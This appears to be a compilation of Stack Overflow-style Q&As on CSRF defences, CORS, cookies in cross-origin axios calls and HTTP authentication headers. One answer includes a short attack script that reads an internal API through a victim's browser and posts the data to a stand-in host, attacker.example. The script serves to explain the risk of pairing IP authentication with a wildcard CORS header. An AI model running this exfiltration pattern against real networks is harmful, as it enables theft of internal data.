CSRF sync token vs origin/referrer URL - csrf

Given that the Origin, Referer and Host headers cannot be spoofed by JavaScript,
is there a strong reason to use the synchronizer token pattern over just checking the Origin, Referer and Host headers for CSRF prevention on (POST, DELETE, PUT) requests?
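For reference, the header-based check described here might look roughly like the following sketch, assuming an Express-style app in TypeScript; the allowed origin and middleware name are invented for illustration, and a synchronizer token would instead compare a per-session secret carried in the request body or a custom header.
import { Request, Response, NextFunction } from "express";

// Hypothetical origin of the site being protected.
const ALLOWED_ORIGIN = "https://app.example.com";

// Reject state-changing requests whose Origin/Referer does not match our site.
export function rejectCrossSiteWrites(req: Request, res: Response, next: NextFunction): void {
  if (!["POST", "PUT", "DELETE"].includes(req.method)) {
    next();
    return;
  }
  // Browsers set Origin on cross-origin requests; Referer serves as a fallback.
  const source = req.headers.origin ?? req.headers.referer ?? "";
  if (!source.startsWith(ALLOWED_ORIGIN)) {
    res.status(403).send("Rejected: unexpected Origin/Referer");
    return;
  }
  next();
}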

Related

Is allowing global CORS in my case security issue

I have a REST API which is publicly available with API key authentication, but I want to allow the private network to access the API without authentication. Is it safe to add the global CORS header
Access-Control-Allow-Origin: *
Note that I am doing authentication in HAProxy:
acl private_ip src -m reg -i (^127\\.0\\.0\\.1)|(^10.*)|(^172\\.1[6-9].*)|(^172\\.2[0-9].*)|(^172\\.3[0-1].*)|(^192\\.168.*)|(^::1$)|(^[fF][cCdD])|(0:0:0:0:0:0:0:1)
I read that setting CORS to "*" can cause security issues when there is IP-based authentication, but since I am not sure how the "src" IP address in HAProxy is obtained, I can't tell whether this security risk is present in my case.
It is strongly recommended not to use IP authentication and a permissive CORS policy together.
CORS allows for script on a page served from one host to process a response from a call to a resource on another host when normally a well-behaved browser would stop script on the page from reading the response. For example where a page on webserver.com includes an AJAX call to a resource on api-server.com.
CORS is enforced by the browser, so an attacker making their own calls to your API can simply ignore your CORS headers; and with a permissive header, the same applies to anything they can get another user's browser to do by serving them a malicious page.
API authentication (whether by token or by IP) is a server-side protection that allows you to filter your response to the request. Consider the case where your attacker has access to your network. They can make a request to your API and your IP authentication lets them get the data. CORS is not the solution to that, but you of course secure your network well and only your users have access to it.
However, if the attacker controls a website (say, compromised.example.com) then they can send a user on your network a link to their page. When your user goes to the page, they are served a script that makes a call to your API. Because you permit the request based on IP, you provide the response.
This is where CORS comes in. If you have a header allowing '*' on your API responses, then the browser on your network will happily provide the requesting page (served from the attacker who is not on your network) with the response.
So the attacker has unauthenticated access to your API if they can get one of your network's users to browse to their malicious page, and they can exfiltrate any response that a user on your network can get.
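To make the attack concrete, the script on the attacker's page can be as small as this sketch (both URLs are invented for illustration); reading the response body only works because Access-Control-Allow-Origin: * is present.
// Runs in the victim's browser, on the attacker's page, inside the private network.
// The IP check passes because the request comes from the victim's address, and the
// permissive CORS header lets this foreign page read the response.
async function exfiltrate(): Promise<void> {
  const res = await fetch("https://api.internal.example/v10/configs"); // hypothetical internal API
  const data = await res.text(); // readable only because of Access-Control-Allow-Origin: *
  await fetch("https://attacker.example/collect", { method: "POST", body: data });
}
exfiltrate();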

Nuxt axios request without cookies specific uri

This project is on nuxtjs.
I don't think it's important, but maybe it can be a clue.
I need to get order detail information using axios and the URL below:
/users/orders/d/20210806000349
But, very weirdly, axios requests that URL without cookies.
Of course, I have already set withCredentials: true.
When I change the URL to /20210806000349, everything is okay.
Can someone help me with this?
I'd need more detail about the domains, but maybe the API domain and the Nuxt domain are different. In that case you should care about CORS.
What is CORS?
Cross-Origin Resource Sharing (CORS) is an HTTP-header based mechanism that allows a server to indicate any origins (domain, scheme, or port) other than its own from which a browser should permit loading of resources. CORS also relies on a mechanism by which browsers make a "preflight" request to the server hosting the cross-origin resource, in order to check that the server will permit the actual request. In that preflight, the browser sends headers that indicate the HTTP method and headers that will be used in the actual request.
MDN
What happens if you make a request to a foreign domain?
The user agent sends an OPTIONS request to the foreign host.
The foreign host sends a response with some headers.
The user agent looks at the Access-Control-Allow-Origin header and, if its value does not match your domain, blocks the request.
If the request's withCredentials is true, the user agent looks at the Access-Control-Allow-Credentials header and, if its value is true, sends the request with cookies; otherwise it sends the request without cookies.
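A minimal axios sketch of the credentialed case just described, assuming the API and the Nuxt app live on different (invented) domains; the header values in the comments are what the browser expects from the server before it attaches the cookie.
import axios from "axios";

// Cookies are only attached to a cross-origin call when the client opts in...
const api = axios.create({
  baseURL: "https://api.example.com", // hypothetical API domain, different from the page's domain
  withCredentials: true,              // ask the browser to include cookies
});

// ...and the server answers the preflight and the actual request with roughly:
//   Access-Control-Allow-Origin: https://app.example.com   (the exact page origin, not *)
//   Access-Control-Allow-Credentials: true
api.get("/users/orders/d/20210806000349")
  .then(res => console.log(res.data))
  .catch(err => console.error(err));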
Figured it out myself:
A cross-origin GET request can also trigger a preflight OPTIONS request,
but in this case Chrome doesn't show the OPTIONS request.
I checked this on Firefox.

What WWW-Authenticate header should an HTTP server return in a 401 response when using form-based authentication?

I have a web application with a Javascript part running on the browser. That frontend uses several HTTP endpoints (more or less REST). The frontend must be able to distinguish between 401 and 403 responses and must not receive the 3xx redirects usually used for human users.
Authentication is done with a plain form login (no JavaScript involved there), then a session cookie is used (for both "REST" and normal requests).
What would be a correct value for the WWW-Authenticate header value?
From RFC 7235: "A server generating a 401 (Unauthorized) response MUST send a WWW-Authenticate header field containing at least one challenge."
The Hypertext Transfer Protocol (HTTP) Authentication Scheme Registry does not list any scheme for form-based authentication.
See also:
HTTP 401 Unauthorized when not using HTTP basic auth?
Authorization in RESTful HTTP API, 401 WWW-Authenticate
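As an aside, the client-side requirement here (telling 401 apart from 403) could be handled with a response interceptor roughly like this sketch, assuming axios in TypeScript, that the API really does answer 401 vs 403, and an invented /login path.
import axios from "axios";

// 401: not authenticated (session missing or expired); 403: authenticated but not allowed.
axios.interceptors.response.use(
  response => response,
  error => {
    const status = error.response?.status;
    if (status === 401) {
      window.location.assign("/login");
    } else if (status === 403) {
      console.warn("Authenticated, but not allowed to perform this action.");
    }
    return Promise.reject(error);
  },
);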
What would be a correct value for the WWW-Authenticate header value?
There's no point in returning 401 and WWW-Authenticate when you are not using HTTP authentication as described in RFC 7235. In HTTP authentication, the client is expected to send the credentials in the Authorization header of the request with an authentication scheme token.
If you want to send the credentials in the request payload using POST, the 403 status code would be more suitable to indicate that the server has refused the request.
Since there is no standard challenge for this type of authentication, you are (as you predicted yourself) inventing your own.
I don't think there is a standard mechanism for specifying vendor tokens here, so I think the best thing you can do is use a token that's unlikely to clash with anything else.
Amazon has done this with AWS, and there are many others. My recommendation would be to use something like productname-schemename, for example acme-webauth.
In theory you should respond
HTTP/1.x 401 Unauthorized
WWW-Authenticate: cookie; cookie-name=my-session-cookie-name
However, real world internet browsers (user agents) do not really support this and in my experience the least bad option is to use HTTP status 403 for all of "Access Denied", "Unauthorized" or "Not allowed". If you have a REST service that's accessed with non-browser user-agents only, you could just follow the spec and return the above headers.
Also note that, as described in RFC 7231 section 6.5.4 (https://www.rfc-editor.org/rfc/rfc7231#section-6.5.4), the server can respond with 404 for both "Access Denied" and "Not Found", so the following should be okay for all user agents (browsers and standalone clients):
403 Unauthorized or Not allowed
404 Access Denied or Not Found
Or, you can just use 400 for any case, because that should cause the browser to fall back to generic error handling. The HTTP status code 401 is especially problematic because it has historically meant (at least in practice) that Basic realm authentication is in use and the submitted Authorization header was not accepted. Because you cannot submit the session cookie via that header with commonly available browsers, those browsers have trouble handling 401 correctly when you use cookies for authentication. (According to the spec, an HTTP 401 MUST include the WWW-Authenticate header, which the user agent should use to figure out the correct handling, but this doesn't seem to happen in reality with browsers.)
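Put together, a rough sketch of that compromise could look like the following (an Express-style handler in TypeScript; the cookie name, the challenge value and the browser detection are all illustrative, not any standard).
import express, { NextFunction, Request, Response } from "express";

const app = express();

// Placeholder for whatever session validation the application really uses.
function hasValidSession(req: Request): boolean {
  return Boolean(req.headers.cookie?.includes("my-session-cookie-name="));
}

app.use("/api", (req: Request, res: Response, next: NextFunction) => {
  if (hasValidSession(req)) {
    next();
    return;
  }
  // Browsers tend to mishandle 401 with a non-standard challenge, so just deny them.
  if ((req.headers.accept ?? "").includes("text/html")) {
    res.status(403).send("Access denied");
    return;
  }
  // Spec-compliant path for non-browser clients: a 401 MUST carry a challenge.
  res.set("WWW-Authenticate", 'cookie; cookie-name="my-session-cookie-name"');
  res.status(401).send("Unauthorized");
});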
There is no HTTP authentication scheme for form based authentication.
Browsers implement basic, digest, etc. by showing a pop up where you can enter credentials.

Cross Origin calls from curl working without needed headers

I am invoking one of my APIs using curl as follows (cross-origin):
curl -H "Origin: foo.com" -H "Content-Type: application/json" -H "Authorization: Basic YWRtaW46YWRtaW4=" -v https://localhost:9443/api/v10/configs -k
I have not set the necessary cross-origin headers on the server side, but the API call works. Why is that?
On the server-side API class, in the OPTIONS call I am only setting the Allow header.
@OPTIONS
public Response options() {
    return Response.ok().header(HttpHeaders.ALLOW, "GET").build();
}
The following headers are not set.
Access-Control-Allow-Methods:
Access-Control-Allow-Origin:
Access-Control-Allow-Headers:
CORS is a mechanism to enable cross-domain requests, but only in the browser (e.g. via AJAX). If you use curl you can do what you want ;-)
So in your case (using curl), you execute the request outside a browser, and you are free to do what you want! With curl, the request will always be executed and you can see the exchanged headers, for example. This can be helpful to check whether you have the expected CORS headers...
Hope it helps you,
Thierry
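To see the difference, here is the same call issued from a page on foo.com with fetch instead of curl (the URL and credentials are the question's own test values): the Authorization and Content-Type headers force a preflight, and with no Access-Control-Allow-* headers on the response, the browser refuses to let the script read it, a check curl never performs.
// Same endpoint and headers as the curl command above, but run from a browser page on foo.com.
fetch("https://localhost:9443/api/v10/configs", {
  headers: {
    "Content-Type": "application/json",
    Authorization: "Basic YWRtaW46YWRtaW4=",
  },
})
  .then(res => res.json())
  .then(data => console.log(data))
  .catch(err => console.error("Blocked by the browser's CORS check:", err));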
You may want to read HTTP access control (CORS) to get a better understanding of how it works, and the main purpose it serves.
Just an intro snippet:
For security reasons, browsers restrict cross-origin HTTP requests initiated from within scripts. For example, XMLHttpRequest follows the same-origin policy. So, a web application using XMLHttpRequest could only make HTTP requests to its own domain. To improve web applications, developers asked browser vendors to allow XMLHttpRequest to make cross-domain requests.
The W3C Web Applications Working Group recommends the new Cross-Origin Resource Sharing (CORS) mechanism. CORS gives web servers cross-domain access controls, which enable secure cross-domain data transfers. Modern browsers use CORS in an API container - such as XMLHttpRequest - to mitigate risks of cross-origin HTTP requests.
So CORS was introduced to allow cross-domain access (from scripts) in browsers. How it works is that when a request is made that requires cross-domain authorization, the browser first makes an OPTIONS ("preflight") request to look for the access-control response headers. If they are there, then it makes the actual request. Otherwise there is a request error.
As an aside, I would avoid implementing CORS support in resource methods. I would instead use a filter mechanism so all requests are handled in the filter, instead of having to implement an @OPTIONS method for all endpoints.
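As a sketch of that filter idea: the answer presumably has a JAX-RS ContainerResponseFilter in mind, but the same pattern, shown here as an Express-style middleware in TypeScript with an invented origin, sets the CORS headers in one place for every endpoint.
import express, { NextFunction, Request, Response } from "express";

// One place sets the CORS headers, instead of an @OPTIONS method per resource.
function corsFilter(req: Request, res: Response, next: NextFunction): void {
  res.set("Access-Control-Allow-Origin", "https://webapp.example.com"); // example origin
  res.set("Access-Control-Allow-Methods", "GET, POST, PUT, DELETE, OPTIONS");
  res.set("Access-Control-Allow-Headers", "Content-Type, Authorization");
  if (req.method === "OPTIONS") {
    res.sendStatus(204); // answer preflights centrally
    return;
  }
  next();
}

const app = express();
app.use(corsFilter);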

Determining web HTTP authentication methods

How do you determine if a REST webservice is using Basic, Kerberos, NTLM, or one of the many other authentication methods?
When you send an unauthenticated request, the service has to respond with "HTTP/1.1 401 Unauthorized", and the response contains a WWW-Authenticate header that specifies what authentication scheme is expected (Basic, Digest), the security realm and any other specific value (like Digest's nonce). So if the server responds with:
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Digest realm="example.com",
qop="auth,auth-int",
nonce="...",
opaque="..."
it wants a Digest authentication. If the response looks like:
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Basic realm="example.com"
then it wants Basic authentication. Some poorly implemented servers/sites don't handle Basic correctly and respond directly with 403 Forbidden instead of challenging first.
NTLM is similar in that the server responds with a 401 and a WWW-Authenticate header with the value NTLM, but there is no official public spec for it, since it is Microsoft proprietary. There are various reverse-engineered descriptions.
Unfortunately REST does not come with a WSDL style description of service to discover the authentication scheme used a priori.
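A small probe along those lines, assuming Node 18+ where fetch is built in (the URL is a placeholder):
// Send one unauthenticated request and report the advertised scheme, e.g.
// 'Basic realm="example.com"' or 'Digest realm="example.com", qop="auth,auth-int", ...'.
async function detectAuthScheme(url: string): Promise<string | null> {
  const res = await fetch(url);
  if (res.status !== 401) {
    return null; // no challenge: the service may answer 403 or something non-standard
  }
  return res.headers.get("www-authenticate");
}

detectAuthScheme("https://api.example.com/whoami")
  .then(scheme => console.log(scheme ?? "No WWW-Authenticate challenge returned"));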
You send it a request, presumably get an HTTP 401 code, and look at the WWW-Authenticate header that (per RFC 2616) the response MUST include. If instead you get a 403 or some other weird status, or a missing WWW-Authenticate header, you curse at website authors who don't follow the core HTTP RFC, and start sniffing the traffic to try to reverse engineer what nonstandard mess they've done this time ;-).
If it's a black box scenario, I usually connect with Fiddler, and inspect the actual traffic.